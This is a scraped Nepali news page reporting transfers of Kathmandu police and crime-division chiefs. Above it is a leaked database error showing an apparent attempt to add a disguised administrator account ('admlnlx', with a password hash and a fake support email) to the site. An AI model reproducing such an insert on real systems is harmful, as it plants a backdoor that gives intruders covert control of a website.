WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BCy.sGr7p5Kgnt4TYYq1ZqfibmZYOd0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 18:49:57', '', 'admlnlx', 'admlnlx')

काठमाडौं प्रहरी प्रमुख फेरिए, अपराध महाशाखामा थापा – Gaule Khabar

काठमाडौं प्रहरी प्रमुख फेरिए, अपराध महाशाखामा थापा

काठमाडौं प्रहरी प्रमुख फेरिए, अपराध महाशाखामा थापा

गाउँले न्यूज, २३ वैशाख, काठमाडौं । प्रहरी प्रधान कार्यालयले काठमाडौं प्रहरी परिसर र अपराध महाशाखामा नेतृत्व परिवर्तन गरेको छ ।
काठमाडौंको प्रहरी प्रमुखमा एसएसपी उत्तमराज सुवेदी सरुवा भएका छन् भने काठमाडौं प्रहरी प्रमुख वसन्त लामा लागू औषध नियन्त्रण व्यूरोमा सरुवा भएका छन् । यस्तै अपराध महाशाखाको प्रमुखमा एसएसपी सहकुल थापा सरुवा भएका छन् । विराटनगर तालिमकेन्द्रमा रहेका थापालाई धिरजप्रताप सिंहको ठाउँमा ल्याइएको प्रहरी प्रधान कार्यालय स्रोतले जनाएको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका